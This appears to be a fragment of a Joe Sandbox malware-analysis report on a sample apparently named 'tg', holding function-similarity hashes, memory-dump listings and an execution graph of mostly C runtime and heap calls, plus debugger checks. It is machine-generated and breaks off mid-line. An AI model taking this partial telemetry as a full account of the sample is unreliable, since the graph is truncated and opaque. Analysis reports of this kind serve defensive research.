                                      Similarity
                                      • API ID: CriticalFreeHeapSection$EnterLeave
                                      • String ID:
                                      • API String ID: 1298188129-0
                                      • Opcode ID: 9025b1c5150b3b55cbdbde059a5d8489335d355e00ab4da0a2b3a5ee45c47fee
                                      • Instruction ID: 19831624efecdb95f34469d84cf285095463f1f7ead1137181efdd2e3cba2855
                                      • Opcode Fuzzy Hash: 9025b1c5150b3b55cbdbde059a5d8489335d355e00ab4da0a2b3a5ee45c47fee
                                      • Instruction Fuzzy Hash: CB012879A0161AAFC7208F96ED04967BB7CFB49751305853AA844A7A60C734E824DFE8
                                      APIs
                                        • Part of subcall function 0040A11A: memset.MSVCRT ref: 0040A182
                                        • Part of subcall function 0040D946: EnterCriticalSection.KERNEL32(00418624,00000200,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3), ref: 0040D95A
                                        • Part of subcall function 0040D946: HeapFree.KERNEL32(00000000,?,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3,00000004), ref: 0040D9A8
                                        • Part of subcall function 0040D946: LeaveCriticalSection.KERNEL32(00418624,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015), ref: 0040D9AF
                                      • HeapFree.KERNEL32(00000000,?,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000), ref: 00409EFA
                                      • HeapFree.KERNEL32(00000000,?,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409F06
                                      • HeapFree.KERNEL32(00000000,?,?,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200), ref: 00409F1A
                                      • HeapFree.KERNEL32(00000000,00000000,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409F30
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: FreeHeap$CriticalSection$EnterLeavememset
                                      • String ID:
                                      • API String ID: 4254243056-0
                                      • Opcode ID: 725e25c77e1e11b4bf87ed01b6ee150763b189248ade4676bad763f5516a4b52
                                      • Instruction ID: 731859a3b15cae5753bb7de1e8a6b13bc7caaa2a8ebc947d3a100cd7cc498ee7
                                      • Opcode Fuzzy Hash: 725e25c77e1e11b4bf87ed01b6ee150763b189248ade4676bad763f5516a4b52
                                      • Instruction Fuzzy Hash: ABF04471215109BFC6115F16DD40D57BF6DFF8A7A43424129B40493571CB36EC20AAA8

                                      Execution Graph

                                      Execution Coverage: 4.2%
                                      Dynamic/Decrypted Code Coverage: 0%
                                      Signature Coverage: 6.7%
                                      Total number of Nodes: 1362
                                      Total number of Limit Nodes: 21
                                      execution_graph 10194 414645 10195 40e542 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 10194->10195 10196 41465b 10195->10196 10202 414666 10196->10202 10203 416785 10196->10203 10199 4146b5 10212 41456e 10199->10212 10204 410540 __getptd 66 API calls 10203->10204 10205 416792 10204->10205 10206 4167d6 10205->10206 10207 4167f9 10205->10207 10210 41469e 10205->10210 10206->10210 10216 415c73 10206->10216 10207->10210 10226 4163f3 10207->10226 10210->10199 10211 4144b1 RtlUnwind 10210->10211 10211->10199 10213 414580 10212->10213 10214 414592 10212->10214 10213->10202 10215 410540 __getptd 66 API calls 10214->10215 10215->10213 10217 415c7f ___BuildCatchObjectHelper 10216->10217 10218 410540 __getptd 66 API calls 10217->10218 10224 415c9f __CallSettingFrame@12 10218->10224 10219 415d10 10271 415d35 10219->10271 10223 415d26 ___BuildCatchObjectHelper 10223->10210 10224->10219 10265 413477 10224->10265 10225 413477 ___BuildCatchObjectHelper 69 API calls 10225->10223 10227 416412 10226->10227 10228 413477 ___BuildCatchObjectHelper 69 API calls 10227->10228 10230 41642c 10227->10230 10228->10230 10229 41674d 10232 410540 __getptd 66 API calls 10229->10232 10236 410540 __getptd 66 API calls 10230->10236 10259 41650b FindHandler type_info::operator== ___TypeMatch 10230->10259 10231 416734 10365 4162ec 10231->10365 10235 416755 10232->10235 10233 41342b __CxxUnhandledExceptionFilter 68 API calls 10233->10259 10237 416763 10235->10237 10239 413477 ___BuildCatchObjectHelper 69 API calls 10235->10239 10238 416473 10236->10238 10237->10210 10238->10237 10241 410540 __getptd 66 API calls 10238->10241 10239->10237 10243 416485 10241->10243 10244 410540 __getptd 66 API calls 10243->10244 10247 416493 ___BuildCatchObjectHelper 10244->10247 10246 415e12 FindHandler 69 API calls 10246->10259 10249 413477 ___BuildCatchObjectHelper 69 API calls 10247->10249 10251 4164af 10247->10251 10248 4164d9 10250 410540 __getptd 66 API 
calls 10248->10250 10249->10251 10252 4164de 10250->10252 10251->10248 10255 413477 ___BuildCatchObjectHelper 69 API calls 10251->10255 10256 410540 __getptd 66 API calls 10252->10256 10252->10259 10254 410540 66 API calls __getptd 10254->10259 10255->10248 10257 4164f0 10256->10257 10258 410540 __getptd 66 API calls 10257->10258 10260 4164fb 10258->10260 10259->10229 10259->10231 10259->10233 10259->10246 10259->10254 10263 415c73 ___FrameUnwindToState 69 API calls 10259->10263 10328 40e7a0 10259->10328 10331 411119 10259->10331 10334 4146e4 10259->10334 10340 41627e 10259->10340 10350 4144b1 RtlUnwind 10259->10350 10351 415e88 10259->10351 10322 415e12 10260->10322 10263->10259 10276 412140 10265->10276 10267 413483 DecodePointer 10268 413493 10267->10268 10277 41342b 10268->10277 10270 4134ae 10272 410540 __getptd 66 API calls 10271->10272 10273 415d3a 10272->10273 10274 415d1c 10273->10274 10275 410540 __getptd 66 API calls 10273->10275 10274->10223 10274->10225 10275->10274 10276->10267 10278 413437 ___BuildCatchObjectHelper 10277->10278 10279 410540 __getptd 66 API calls 10278->10279 10280 41343c 10279->10280 10283 413fa7 10280->10283 10282 41345e ___BuildCatchObjectHelper 10282->10270 10294 413515 DecodePointer 10283->10294 10285 413fac 10289 413fb7 10285->10289 10295 413522 10285->10295 10287 413fcf 10288 4116b5 _abort 66 API calls 10287->10288 10291 413fd9 10288->10291 10289->10287 10290 410954 __call_reportfault 8 API calls 10289->10290 10290->10287 10292 4116e9 __amsg_exit 66 API calls 10291->10292 10293 413fe1 10292->10293 10293->10282 10294->10285 10298 41352e ___BuildCatchObjectHelper 10295->10298 10296 413589 10297 41356b DecodePointer 10296->10297 10302 413598 10296->10302 10303 41355a _siglookup 10297->10303 10298->10296 10298->10297 10299 413555 10298->10299 10305 413551 10298->10305 10301 4104c7 __getptd_noexit 66 API calls 10299->10301 10301->10303 10304 410b21 __wcsicmp_l 66 API calls 10302->10304 10306 4135f5 10303->10306 10307 413563 
___BuildCatchObjectHelper 10303->10307 10309 4116b5 _abort 66 API calls 10303->10309 10308 41359d 10304->10308 10305->10299 10305->10302 10311 4126fb __lock 66 API calls 10306->10311 10312 413600 10306->10312 10307->10289 10310 410acf __wcsicmp_l 11 API calls 10308->10310 10309->10306 10310->10307 10311->10312 10314 413635 10312->10314 10316 410390 EncodePointer 10312->10316 10317 413689 10314->10317 10316->10314 10318 41368f 10317->10318 10320 413696 10317->10320 10321 412622 LeaveCriticalSection 10318->10321 10320->10307 10321->10320 10323 415e20 10322->10323 10327 415e2a ___TypeMatch 10322->10327 10324 413477 ___BuildCatchObjectHelper 69 API calls 10323->10324 10325 415e25 10324->10325 10326 41342b __CxxUnhandledExceptionFilter 68 API calls 10325->10326 10326->10327 10327->10259 10381 40e742 10328->10381 10332 411142 10331->10332 10333 41114e RaiseException 10331->10333 10332->10333 10333->10259 10336 4146fd 10334->10336 10335 414731 10337 41474a 10335->10337 10338 413477 ___BuildCatchObjectHelper 69 API calls 10335->10338 10336->10335 10339 413477 ___BuildCatchObjectHelper 69 API calls 10336->10339 10337->10259 10338->10337 10339->10336 10341 416289 10340->10341 10343 416296 10340->10343 10387 4161ec 10341->10387 10391 4144b1 RtlUnwind 10343->10391 10345 4162ad 10346 415c73 ___FrameUnwindToState 69 API calls 10345->10346 10347 4162bb 10346->10347 10392 415ed1 10347->10392 10349 4162dc FindHandlerForForeignException 10349->10259 10350->10259 10352 415e94 __EH_prolog3_catch 10351->10352 10353 410540 __getptd 66 API calls 10352->10353 10354 415e99 10353->10354 10355 415ea7 10354->10355 10356 413477 ___BuildCatchObjectHelper 69 API calls 10354->10356 10435 413464 10355->10435 10356->10355 10366 4163ee 10365->10366 10367 416304 10365->10367 10366->10229 10368 410540 __getptd 66 API calls 10367->10368 10369 41630a 10368->10369 10370 41634f 10369->10370 10371 410540 __getptd 66 API calls 10369->10371 10370->10366 10372 416368 10370->10372 10374 413477 
___BuildCatchObjectHelper 69 API calls 10370->10374 10373 416318 10371->10373 10375 4146e4 _GetRangeOfTrysToCheck 69 API calls 10372->10375 10438 410390 EncodePointer 10373->10438 10374->10372 10379 41637d 10375->10379 10377 416323 10377->10370 10378 41456e _CallSETranslator 66 API calls 10377->10378 10378->10370 10379->10366 10380 41627e FindHandlerForForeignException 70 API calls 10379->10380 10380->10379 10382 40e750 _strlen 10381->10382 10383 40e775 10381->10383 10384 410b93 _malloc 66 API calls 10382->10384 10383->10259 10385 40e762 10384->10385 10385->10383 10386 410b34 _strcpy_s 66 API calls 10385->10386 10386->10383 10388 4161f8 ___BuildCatchObjectHelper 10387->10388 10406 41606d 10388->10406 10390 416227 ___BuildCatchObject ___BuildCatchObjectHelper 10390->10343 10391->10345 10393 415edd ___BuildCatchObjectHelper 10392->10393 10410 414757 10393->10410 10396 410540 __getptd 66 API calls 10397 415f08 10396->10397 10398 410540 __getptd 66 API calls 10397->10398 10399 415f16 10398->10399 10400 410540 __getptd 66 API calls 10399->10400 10401 415f24 10400->10401 10402 410540 __getptd 66 API calls 10401->10402 10403 415f2f _CallCatchBlock2 10402->10403 10415 415ff7 10403->10415 10405 415fe3 ___BuildCatchObjectHelper 10405->10349 10408 416079 ___BuildCatchObjectHelper 10406->10408 10407 413477 ___BuildCatchObjectHelper 69 API calls 10409 4160e6 _memmove ___BuildCatchObjectHelper 10407->10409 10408->10407 10408->10409 10409->10390 10411 410540 __getptd 66 API calls 10410->10411 10412 41476a 10411->10412 10413 410540 __getptd 66 API calls 10412->10413 10414 414778 10413->10414 10414->10396 10424 4147aa 10415->10424 10418 410540 __getptd 66 API calls 10419 41600b 10418->10419 10420 410540 __getptd 66 API calls 10419->10420 10422 416019 10420->10422 10421 41605c FindHandler 10421->10405 10422->10421 10432 414783 10422->10432 10425 410540 __getptd 66 API calls 10424->10425 10426 4147b5 10425->10426 10427 4147d1 10426->10427 10428 4147c0 10426->10428 10430 410540 
__getptd 66 API calls 10427->10430 10429 410540 __getptd 66 API calls 10428->10429 10431 4147c5 10429->10431 10430->10431 10431->10418 10433 410540 __getptd 66 API calls 10432->10433 10434 41478d 10433->10434 10434->10421 10436 410540 __getptd 66 API calls 10435->10436 10437 413469 10436->10437 10438->10377 11160 41055a 11161 410566 ___BuildCatchObjectHelper 11160->11161 11162 410cbb _free 66 API calls 11161->11162 11163 41057e 11161->11163 11193 410668 ___BuildCatchObjectHelper 11161->11193 11162->11163 11164 41058c 11163->11164 11165 410cbb _free 66 API calls 11163->11165 11166 41059a 11164->11166 11167 410cbb _free 66 API calls 11164->11167 11165->11164 11168 4105a8 11166->11168 11169 410cbb _free 66 API calls 11166->11169 11167->11166 11170 4105b6 11168->11170 11171 410cbb _free 66 API calls 11168->11171 11169->11168 11172 4105c4 11170->11172 11173 410cbb _free 66 API calls 11170->11173 11171->11170 11174 4105d2 11172->11174 11175 410cbb _free 66 API calls 11172->11175 11173->11172 11176 4105e3 11174->11176 11177 410cbb _free 66 API calls 11174->11177 11175->11174 11178 4126fb __lock 66 API calls 11176->11178 11177->11176 11179 4105eb 11178->11179 11180 410610 11179->11180 11181 4105f7 InterlockedDecrement 11179->11181 11196 410674 11180->11196 11181->11180 11182 410602 11181->11182 11182->11180 11185 410cbb _free 66 API calls 11182->11185 11185->11180 11186 4126fb __lock 66 API calls 11187 410624 11186->11187 11188 410655 11187->11188 11189 4100e6 ___removelocaleref 8 API calls 11187->11189 11199 410680 11188->11199 11194 410639 11189->11194 11192 410cbb _free 66 API calls 11192->11193 11194->11188 11195 41017f ___freetlocinfo 66 API calls 11194->11195 11195->11188 11202 412622 LeaveCriticalSection 11196->11202 11198 41061d 11198->11186 11203 412622 LeaveCriticalSection 11199->11203 11201 410662 11201->11192 11202->11198 11203->11201 8834 40f6f6 8874 412140 8834->8874 8836 40f702 GetStartupInfoW 8837 40f716 HeapSetInformation 8836->8837 8839 40f721 8836->8839 
8837->8839 8875 412117 HeapCreate 8839->8875 8840 40f76f 8841 40f77a 8840->8841 9007 40f6cd 8840->9007 8876 410689 GetModuleHandleW 8841->8876 8844 40f780 8845 40f6cd _fast_error_exit 66 API calls 8844->8845 8846 40f78b __RTC_Initialize 8844->8846 8845->8846 8901 411e86 GetStartupInfoW 8846->8901 8849 40f7a5 GetCommandLineA 8914 411def GetEnvironmentStringsW 8849->8914 8856 40f7ca 8940 411abe 8856->8940 8857 4116e9 __amsg_exit 66 API calls 8857->8856 8859 40f7d0 8860 40f7db 8859->8860 8861 4116e9 __amsg_exit 66 API calls 8859->8861 8960 4114c8 8860->8960 8861->8860 8863 40f7e3 8864 40f7ee 8863->8864 8866 4116e9 __amsg_exit 66 API calls 8863->8866 8966 411a5f 8864->8966 8866->8864 8870 40f81e 9022 4116cb 8870->9022 8873 40f823 ___BuildCatchObjectHelper 8874->8836 8875->8840 8877 4106a6 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 8876->8877 8878 41069d 8876->8878 8880 4106f0 TlsAlloc 8877->8880 9025 4103d6 8878->9025 8883 4107ff 8880->8883 8884 41073e TlsSetValue 8880->8884 8883->8844 8884->8883 8885 41074f 8884->8885 9035 411471 8885->9035 8890 410797 DecodePointer 8893 4107ac 8890->8893 8891 4107fa 8892 4103d6 __mtterm 70 API calls 8891->8892 8892->8883 8893->8891 9044 412773 8893->9044 8896 4107ca DecodePointer 8897 4107db 8896->8897 8897->8891 8898 4107df 8897->8898 9050 410413 8898->9050 8900 4107e7 GetCurrentThreadId 8900->8883 8902 412773 __calloc_crt 66 API calls 8901->8902 8913 411ea4 8902->8913 8903 41204f GetStdHandle 8909 412019 8903->8909 8904 412773 __calloc_crt 66 API calls 8904->8913 8905 4120b3 SetHandleCount 8906 40f799 8905->8906 8906->8849 9015 4116e9 8906->9015 8907 412061 GetFileType 8907->8909 8908 411f99 8908->8909 8910 411fd0 InitializeCriticalSectionAndSpinCount 8908->8910 8911 411fc5 GetFileType 8908->8911 8909->8903 8909->8905 8909->8907 8912 412087 InitializeCriticalSectionAndSpinCount 8909->8912 8910->8906 8910->8908 8911->8908 8911->8910 8912->8906 8912->8909 8913->8904 8913->8906 8913->8908 8913->8909 8913->8913 8915 
40f7b5 8914->8915 8916 411e0b WideCharToMultiByte 8914->8916 8927 411d34 8915->8927 8918 411e40 8916->8918 8919 411e78 FreeEnvironmentStringsW 8916->8919 8920 41272e __malloc_crt 66 API calls 8918->8920 8919->8915 8921 411e46 8920->8921 8921->8919 8922 411e4e WideCharToMultiByte 8921->8922 8923 411e60 8922->8923 8924 411e6c FreeEnvironmentStringsW 8922->8924 8925 410cbb _free 66 API calls 8923->8925 8924->8915 8926 411e68 8925->8926 8926->8924 8928 411d49 8927->8928 8929 411d4e GetModuleFileNameA 8927->8929 9297 410039 8928->9297 8931 411d75 8929->8931 9291 411b9a 8931->9291 8934 40f7bf 8934->8856 8934->8857 8935 411db1 8936 41272e __malloc_crt 66 API calls 8935->8936 8937 411db7 8936->8937 8937->8934 8938 411b9a _parse_cmdline 76 API calls 8937->8938 8939 411dd1 8938->8939 8939->8934 8941 411ac7 8940->8941 8943 411acc _strlen 8940->8943 8942 410039 ___initmbctable 94 API calls 8941->8942 8942->8943 8944 412773 __calloc_crt 66 API calls 8943->8944 8947 411ada 8943->8947 8949 411b01 _strlen 8944->8949 8945 411b50 8946 410cbb _free 66 API calls 8945->8946 8946->8947 8947->8859 8948 412773 __calloc_crt 66 API calls 8948->8949 8949->8945 8949->8947 8949->8948 8950 411b76 8949->8950 8953 411b8d 8949->8953 9738 410b34 8949->9738 8951 410cbb _free 66 API calls 8950->8951 8951->8947 8954 410a7d __invoke_watson 10 API calls 8953->8954 8955 411b99 8954->8955 8956 413a75 _parse_cmdline 76 API calls 8955->8956 8958 411c26 8955->8958 8956->8955 8957 411d24 8957->8859 8958->8957 8959 413a75 76 API calls _parse_cmdline 8958->8959 8959->8958 8962 4114d6 __IsNonwritableInCurrentImage 8960->8962 9747 4136e3 8962->9747 8963 4114f4 __initterm_e 8965 411515 __IsNonwritableInCurrentImage 8963->8965 9750 4110cb 8963->9750 8965->8863 8967 411a72 8966->8967 8968 411a6d 8966->8968 8970 40f7f4 8967->8970 8971 413a75 _parse_cmdline 76 API calls 8967->8971 8969 410039 ___initmbctable 94 API calls 8968->8969 8969->8967 8972 40deb0 IsDebuggerPresent 8970->8972 8971->8967 8973 40def4 8972->8973 
8974 40df0a 8972->8974 8973->8870 9004 41169f 8973->9004 9815 401100 8974->9815 8977 40dfb0 9822 40de20 8977->9822 8978 40df45 GetPEB 8978->8973 8981 40dfe2 9832 40d7f0 8981->9832 8982 40dfdc 8982->8981 8984 40dfec 8982->8984 8985 40dfe7 8984->8985 9874 40f476 8984->9874 8985->8973 8987 40e0b1 LocalFree 8985->8987 8987->8973 8989 40e04e 8992 40f476 __wcsicoll 78 API calls 8989->8992 8990 40e00e 8991 40e033 8990->8991 8994 40f476 __wcsicoll 78 API calls 8990->8994 9882 405b10 8991->9882 8993 40e05f 8992->8993 8996 40e0a6 8993->8996 8997 40e066 8993->8997 8998 40e02c 8994->8998 9001 40d7f0 92 API calls 8996->9001 9000 40e084 8997->9000 9002 40f476 __wcsicoll 78 API calls 8997->9002 8998->8991 9911 405e10 9000->9911 9001->8985 9002->9000 10074 41155f 9004->10074 9006 4116b0 9006->8870 9008 40f6e0 9007->9008 9009 40f6db 9007->9009 9011 41172d __NMSG_WRITE 66 API calls 9008->9011 9010 4118dc __FF_MSGBANNER 66 API calls 9009->9010 9010->9008 9012 40f6e8 9011->9012 9013 411447 __mtinitlocknum 3 API calls 9012->9013 9014 40f6f2 9013->9014 9014->8841 9016 4118dc __FF_MSGBANNER 66 API calls 9015->9016 9017 4116f3 9016->9017 9018 41172d __NMSG_WRITE 66 API calls 9017->9018 9019 4116fb 9018->9019 10104 4116b5 9019->10104 9023 41155f _doexit 66 API calls 9022->9023 9024 4116d6 9023->9024 9024->8873 9026 4103e0 DecodePointer 9025->9026 9027 4103ef 9025->9027 9026->9027 9028 410400 TlsFree 9027->9028 9029 41040e 9027->9029 9028->9029 9030 4125e7 DeleteCriticalSection 9029->9030 9031 4125ff 9029->9031 9063 410cbb 9030->9063 9033 4106a2 9031->9033 9034 412611 DeleteCriticalSection 9031->9034 9033->8844 9034->9031 9089 410390 EncodePointer 9035->9089 9037 411479 __init_pointers __initp_misc_winsig 9090 4134af EncodePointer 9037->9090 9039 410754 EncodePointer EncodePointer EncodePointer EncodePointer 9040 412581 9039->9040 9041 41258c 9040->9041 9042 412596 InitializeCriticalSectionAndSpinCount 9041->9042 9043 410793 9041->9043 9042->9041 9042->9043 9043->8890 9043->8891 9046 41277c 
9044->9046 9047 4107c2 9046->9047 9048 41279a Sleep 9046->9048 9091 413b47 9046->9091 9047->8891 9047->8896 9049 4127af 9048->9049 9049->9046 9049->9047 9102 412140 9050->9102 9052 41041f GetModuleHandleW 9103 4126fb 9052->9103 9054 41045d InterlockedIncrement 9110 4104b5 9054->9110 9057 4126fb __lock 64 API calls 9058 41047e 9057->9058 9113 410057 InterlockedIncrement 9058->9113 9060 41049c 9125 4104be 9060->9125 9062 4104a9 ___BuildCatchObjectHelper 9062->8900 9064 410cc6 HeapFree 9063->9064 9068 410cef _free 9063->9068 9065 410cdb 9064->9065 9064->9068 9069 410b21 9065->9069 9068->9029 9072 4104c7 GetLastError 9069->9072 9071 410b26 GetLastError 9071->9068 9086 4103a2 TlsGetValue 9072->9086 9075 410534 SetLastError 9075->9071 9076 412773 __calloc_crt 62 API calls 9077 4104f2 9076->9077 9077->9075 9078 4104fa DecodePointer 9077->9078 9079 41050f 9078->9079 9080 410513 9079->9080 9081 41052b 9079->9081 9082 410413 __getptd_noexit 62 API calls 9080->9082 9083 410cbb _free 62 API calls 9081->9083 9084 41051b GetCurrentThreadId 9082->9084 9085 410531 9083->9085 9084->9075 9085->9075 9087 4103d2 9086->9087 9088 4103b7 DecodePointer TlsSetValue 9086->9088 9087->9075 9087->9076 9088->9087 9089->9037 9090->9039 9092 413b53 9091->9092 9097 413b6e 9091->9097 9093 413b5f 9092->9093 9092->9097 9095 410b21 __wcsicmp_l 65 API calls 9093->9095 9094 413b81 HeapAlloc 9096 413ba8 9094->9096 9094->9097 9098 413b64 9095->9098 9096->9046 9097->9094 9097->9096 9100 4110f1 DecodePointer 9097->9100 9098->9046 9101 411106 9100->9101 9101->9097 9102->9052 9104 412710 9103->9104 9105 412723 EnterCriticalSection 9103->9105 9128 412639 9104->9128 9105->9054 9107 412716 9107->9105 9108 4116e9 __amsg_exit 65 API calls 9107->9108 9109 412722 9108->9109 9109->9105 9289 412622 LeaveCriticalSection 9110->9289 9112 410477 9112->9057 9114 410075 InterlockedIncrement 9113->9114 9115 410078 9113->9115 9114->9115 9116 410082 InterlockedIncrement 9115->9116 9117 410085 9115->9117 9116->9117 9118 410092 
9117->9118 9119 41008f InterlockedIncrement 9117->9119 9120 41009c InterlockedIncrement 9118->9120 9121 41009f 9118->9121 9119->9118 9120->9121 9122 4100b8 InterlockedIncrement 9121->9122 9123 4100c8 InterlockedIncrement 9121->9123 9124 4100d3 InterlockedIncrement 9121->9124 9122->9121 9123->9121 9124->9060 9290 412622 LeaveCriticalSection 9125->9290 9127 4104c5 9127->9062 9129 412645 ___BuildCatchObjectHelper 9128->9129 9130 41266b 9129->9130 9153 4118dc 9129->9153 9139 41267b ___BuildCatchObjectHelper 9130->9139 9189 41272e 9130->9189 9137 41268d 9141 410b21 __wcsicmp_l 65 API calls 9137->9141 9138 41269c 9142 4126fb __lock 65 API calls 9138->9142 9139->9107 9141->9139 9143 4126a3 9142->9143 9144 4126d6 9143->9144 9145 4126ab InitializeCriticalSectionAndSpinCount 9143->9145 9148 410cbb _free 65 API calls 9144->9148 9146 4126c7 9145->9146 9147 4126bb 9145->9147 9194 4126f2 9146->9194 9149 410cbb _free 65 API calls 9147->9149 9148->9146 9150 4126c1 9149->9150 9152 410b21 __wcsicmp_l 65 API calls 9150->9152 9152->9146 9197 4139e3 9153->9197 9155 4118e3 9157 4139e3 __NMSG_WRITE 66 API calls 9155->9157 9159 4118f0 9155->9159 9156 41172d __NMSG_WRITE 66 API calls 9158 411908 9156->9158 9157->9159 9161 41172d __NMSG_WRITE 66 API calls 9158->9161 9159->9156 9160 411912 9159->9160 9162 41172d 9160->9162 9161->9160 9163 41174e __NMSG_WRITE 9162->9163 9164 41186a 9163->9164 9166 4139e3 __NMSG_WRITE 63 API calls 9163->9166 9258 40e542 9164->9258 9167 411768 9166->9167 9169 411879 GetStdHandle 9167->9169 9170 4139e3 __NMSG_WRITE 63 API calls 9167->9170 9168 4118da 9186 411447 9168->9186 9169->9164 9173 411887 _strlen 9169->9173 9171 411779 9170->9171 9171->9169 9172 41178b 9171->9172 9172->9164 9222 40f643 9172->9222 9173->9164 9176 4118bd WriteFile 9173->9176 9176->9164 9177 4117b7 GetModuleFileNameW 9178 4117d8 9177->9178 9183 4117e4 _wcslen 9177->9183 9179 40f643 __NMSG_WRITE 63 API calls 9178->9179 9179->9183 9180 410a7d __invoke_watson 10 API calls 9180->9183 9181 40f5ce 
63 API calls __NMSG_WRITE 9181->9183 9183->9180 9183->9181 9184 41185a 9183->9184 9231 40f501 9183->9231 9240 41385c 9184->9240 9268 41141c GetModuleHandleW 9186->9268 9193 412737 9189->9193 9191 412686 9191->9137 9191->9138 9192 41274e Sleep 9192->9193 9193->9191 9193->9192 9272 410b93 9193->9272 9288 412622 LeaveCriticalSection 9194->9288 9196 4126f9 9196->9139 9198 4139ef 9197->9198 9199 4139f9 9198->9199 9200 410b21 __wcsicmp_l 66 API calls 9198->9200 9199->9155 9201 413a12 9200->9201 9204 410acf 9201->9204 9207 410aa2 DecodePointer 9204->9207 9208 410ab7 9207->9208 9213 410a7d 9208->9213 9210 410ace 9211 410aa2 __wcsicmp_l 10 API calls 9210->9211 9212 410adb 9211->9212 9212->9155 9216 410954 9213->9216 9217 410973 _memset __call_reportfault 9216->9217 9218 410991 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9217->9218 9219 410a5f __call_reportfault 9218->9219 9220 40e542 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9219->9220 9221 410a7b GetCurrentProcess TerminateProcess 9220->9221 9221->9210 9223 40f651 9222->9223 9224 40f658 9222->9224 9223->9224 9226 40f679 9223->9226 9225 410b21 __wcsicmp_l 66 API calls 9224->9225 9230 40f65d 9225->9230 9228 40f667 9226->9228 9229 410b21 __wcsicmp_l 66 API calls 9226->9229 9227 410acf __wcsicmp_l 11 API calls 9227->9228 9228->9177 9228->9183 9229->9230 9230->9227 9235 40f513 9231->9235 9232 40f517 9233 410b21 __wcsicmp_l 66 API calls 9232->9233 9234 40f51c 9232->9234 9239 40f533 9233->9239 9234->9183 9235->9232 9235->9234 9237 40f55a 9235->9237 9236 410acf __wcsicmp_l 11 API calls 9236->9234 9237->9234 9238 410b21 __wcsicmp_l 66 API calls 9237->9238 9238->9239 9239->9236 9266 410390 EncodePointer 9240->9266 9242 413882 9243 413892 LoadLibraryW 9242->9243 9244 41390f 9242->9244 9245 4138a7 GetProcAddress 9243->9245 9255 4139a7 9243->9255 9246 41393c 9244->9246 9250 413929 DecodePointer DecodePointer 9244->9250 9249 4138bd 7 API calls 9245->9249 9245->9255 9247 413972 
DecodePointer 9246->9247 9248 41399b DecodePointer 9246->9248 9257 41395f 9246->9257 9247->9248 9254 413979 9247->9254 9248->9255 9249->9244 9251 4138ff GetProcAddress EncodePointer 9249->9251 9250->9246 9251->9244 9252 40e542 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9253 4139c6 9252->9253 9253->9164 9254->9248 9256 41398c DecodePointer 9254->9256 9255->9252 9256->9248 9256->9257 9257->9248 9259 40e54a 9258->9259 9260 40e54c IsDebuggerPresent 9258->9260 9259->9168 9267 4123ca 9260->9267 9263 40f93a SetUnhandledExceptionFilter UnhandledExceptionFilter 9264 40f95f GetCurrentProcess TerminateProcess 9263->9264 9265 40f957 __call_reportfault 9263->9265 9264->9168 9265->9264 9266->9242 9267->9263 9269 411430 GetProcAddress 9268->9269 9270 411445 ExitProcess 9268->9270 9269->9270 9271 411440 9269->9271 9271->9270 9273 410c10 9272->9273 9280 410ba1 9272->9280 9274 4110f1 _malloc DecodePointer 9273->9274 9275 410c16 9274->9275 9277 410b21 __wcsicmp_l 65 API calls 9275->9277 9276 4118dc __FF_MSGBANNER 65 API calls 9276->9280 9287 410c08 9277->9287 9278 410bcf HeapAlloc 9278->9280 9278->9287 9279 41172d __NMSG_WRITE 65 API calls 9279->9280 9280->9276 9280->9278 9280->9279 9281 410bfc 9280->9281 9283 411447 __mtinitlocknum 3 API calls 9280->9283 9284 4110f1 _malloc DecodePointer 9280->9284 9285 410bfa 9280->9285 9282 410b21 __wcsicmp_l 65 API calls 9281->9282 9282->9285 9283->9280 9284->9280 9286 410b21 __wcsicmp_l 65 API calls 9285->9286 9286->9287 9287->9193 9288->9196 9289->9112 9290->9127 9293 411bb9 9291->9293 9295 411c26 9293->9295 9301 413a75 9293->9301 9294 411d24 9294->8934 9294->8935 9295->9294 9296 413a75 76 API calls _parse_cmdline 9295->9296 9296->9295 9298 410042 9297->9298 9299 410049 9297->9299 9625 40fe9f 9298->9625 9299->8929 9304 413a22 9301->9304 9307 40e551 9304->9307 9308 40e564 9307->9308 9309 40e5b1 9307->9309 9315 410540 9308->9315 9309->9293 9313 40e591 9313->9309 9335 40fb96 9313->9335 9316 4104c7 __getptd_noexit 66 API 
